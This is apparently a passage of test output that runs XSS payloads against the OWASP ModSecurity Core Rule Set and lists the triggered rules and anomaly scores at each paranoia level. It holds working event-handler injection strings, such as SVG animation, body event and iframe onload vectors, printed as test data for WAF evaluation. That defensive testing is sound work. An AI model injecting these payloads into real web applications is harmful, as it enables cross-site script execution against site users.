941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
******* payload-031-003 ***********
Payload:
payload=<video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video>
--- Paranoia Level 1 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
******* payload-032-001 ***********
Payload:
payload=<svg><discard onbegin=alert(1)>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-032-002 ***********
Payload:
payload=<svg><anything onload=alert(1)>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-032-003 ***********
Payload:
payload=<svg><animate onbegin=alert(1) attributename=x dur=1s>
payload=<svg><set onend=alert(1) attributename=x dur=1s>
payload=<svg><animatetransform onrepeat=alert(1) attributename=x dur=1s repeatcount=2>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
******* payload-033-001 ***********
Payload:
payload=<body onpageshow=alert(1)>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 30
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 43
******* payload-033-002 ***********
Payload:
payload=<body onpopstate=alert(1)>
payload=<iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com/#';flag=1}">
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 78
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 94
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 107
******* payload-033-003 ***********
Payload:
payload=<body onhashchange="alert(1)">
payload=<iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com#';window.flag=1;}">
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 78
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 94
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 107
******* payload-033-004 ***********
Payload:
payload=<body onmessage=alert(1)><script>postMessage('test','*')</script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 25
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 59
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 72
******* payload-034-001 ***********
Payload:
payload=<body onbeforeunload="location='javascript:alert(1)'"><iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com#';flag=1}">
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 35
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
Total Incoming Score: 93
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 109
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 122
******* payload-034-002 ***********
Payload:
payload=<body onresize="alert(1)"><iframe src=//x-domain.com onload="this.style.width='1000px'">
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 53
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 69
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 82
******* payload-034-003 ***********
Payload:
payload=<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 33
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
